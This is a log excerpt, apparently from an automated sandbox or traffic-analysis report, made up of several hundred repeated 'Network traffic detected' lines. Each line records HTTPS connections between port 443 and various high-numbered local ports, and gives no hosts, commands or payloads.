Source: unknown	Network traffic detected: HTTP traffic on port 57106 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57128
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57129
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57012
Source: unknown	Network traffic detected: HTTP traffic on port 57129 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49852 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57013
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57014
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57015
Source: unknown	Network traffic detected: HTTP traffic on port 53007 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49859
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49858
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49857
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49856
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49855
Source: unknown	Network traffic detected: HTTP traffic on port 49841 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49854
Source: unknown	Network traffic detected: HTTP traffic on port 57117 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49853
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49852
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49851
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49850
Source: unknown	Network traffic detected: HTTP traffic on port 57037 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57016
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57017
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57018
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57019
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57023
Source: unknown	Network traffic detected: HTTP traffic on port 57095 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57024
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57025
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57026
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57020
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57021
Source: unknown	Network traffic detected: HTTP traffic on port 57026 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57022
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49849
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49848
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49847
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49846
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49845
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49844
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49843
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49842
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49841
Source: unknown	Network traffic detected: HTTP traffic on port 52976 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49840
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57027
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57028
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57029
Source: unknown	Network traffic detected: HTTP traffic on port 49828 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57034
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57035
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57036
Source: unknown	Network traffic detected: HTTP traffic on port 57096 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57037
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57030
Source: unknown	Network traffic detected: HTTP traffic on port 57025 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57031
Source: unknown	Network traffic detected: HTTP traffic on port 57048 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57073 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57032
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57033
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49839
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49838
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49837
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49836
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49835
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49834
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49833
Source: unknown	Network traffic detected: HTTP traffic on port 52989 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49832
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49831
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown	Network traffic detected: HTTP traffic on port 49839 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49864 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57062 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57014 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57038
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57039
Source: unknown	Network traffic detected: HTTP traffic on port 49853 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57045
Source: unknown	Network traffic detected: HTTP traffic on port 57105 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57046
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57047
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57048
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57041
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57042
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57043
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57044
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49829
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49828
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49827
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49826
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57040
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49825
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49824
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49823
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49822
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 57036 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 57013 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52990 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 57085 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52975 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 49862 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57107 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57100
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57101
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57102
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57103
Source: unknown	Network traffic detected: HTTP traffic on port 57128 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49851 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57074 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57047 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 57118 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 49863 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 57063 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49840 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57108
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57109
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57086 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52991 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57104
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57105
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57106
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57107
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57111
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57112
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57113
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57114
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57110
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49876
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49875
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49874
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49873
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49872
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49871
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49870
Source: unknown	Network traffic detected: HTTP traffic on port 57035 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57052 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57119
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49874 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57115
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57116
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57117
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57118
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57122
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57123
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57124
Source: unknown	Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57125
Source: unknown	Network traffic detected: HTTP traffic on port 57024 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57120
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57121
Source: unknown	Network traffic detected: HTTP traffic on port 52980 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49869
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49868
Source: unknown	Network traffic detected: HTTP traffic on port 57097 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49867
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49866
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52998
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52999
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52992
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52993
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52990
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52991
Source: unknown	Network traffic detected: HTTP traffic on port 57126 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52996
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52997
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52994
Source: unknown	Network traffic detected: HTTP traffic on port 52997 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57103 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52995
Source: unknown	Network traffic detected: HTTP traffic on port 53010 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57046 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57023 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57096
Source: unknown	Network traffic detected: HTTP traffic on port 49826 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57097
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57098
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57099
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57092
Source: unknown	Network traffic detected: HTTP traffic on port 52968 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57093
Source: unknown	Network traffic detected: HTTP traffic on port 57075 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57094
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57095
Source: unknown	Network traffic detected: HTTP traffic on port 49849 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57098 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57090
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57091
Source: unknown	Network traffic detected: HTTP traffic on port 57012 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49837 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57064 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49872 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52979 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52986 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49861 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57114 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57034 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57053 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49873 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57127 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49850 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 57087 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57102 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52998 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57045 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57076 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown	Network traffic detected: HTTP traffic on port 57116 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57088 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49859 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57065 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49871 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57049
Source: unknown	Network traffic detected: HTTP traffic on port 52978 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57056
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57057
Source: unknown	Network traffic detected: HTTP traffic on port 52987 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57058
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57059
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57052
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57053
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57054
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57055
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57050
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57051
Source: unknown	Network traffic detected: HTTP traffic on port 49816 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57033 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52968
Source: unknown	Network traffic detected: HTTP traffic on port 57054 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52969
Source: unknown	Network traffic detected: HTTP traffic on port 57125 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57104 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53011 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57022 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57067
Source: unknown	Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57068
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57069
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57063
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57064
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57065
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57066
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57060
Source: unknown	Network traffic detected: HTTP traffic on port 49848 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57061
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57062
Source: unknown	Network traffic detected: HTTP traffic on port 57099 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53000 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52978
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52979
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52976
Source: unknown	Network traffic detected: HTTP traffic on port 49838 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52977
Source: unknown	Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52970
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52974
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52975
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52972
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52973
Source: unknown	Network traffic detected: HTTP traffic on port 52999 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57078
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57079
Source: unknown	Network traffic detected: HTTP traffic on port 57021 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57074
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57075
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57076
Source: unknown	Network traffic detected: HTTP traffic on port 57044 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57077
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57070
Source: unknown	Network traffic detected: HTTP traffic on port 49860 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57071
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57072
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57073
Source: unknown	Network traffic detected: HTTP traffic on port 57077 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57115 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52989
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52987
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52988
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52981
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52982
Source: unknown	Network traffic detected: HTTP traffic on port 57066 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52980
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52985
Source: unknown	Network traffic detected: HTTP traffic on port 52977 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52986
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52983
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52984
Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57089
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57085
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57086
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57087
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57088
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57081
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57082
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57083
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57084
Source: unknown	Network traffic detected: HTTP traffic on port 52988 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57080
Source: unknown	Network traffic detected: HTTP traffic on port 57055 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57032 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57090 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52983 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53001 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49858 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57089 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57100 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57043 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57078 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49869 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49834 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57124 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52995 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57067 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57111 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49847 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57031 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57056 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49822 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49870 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57020 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53000
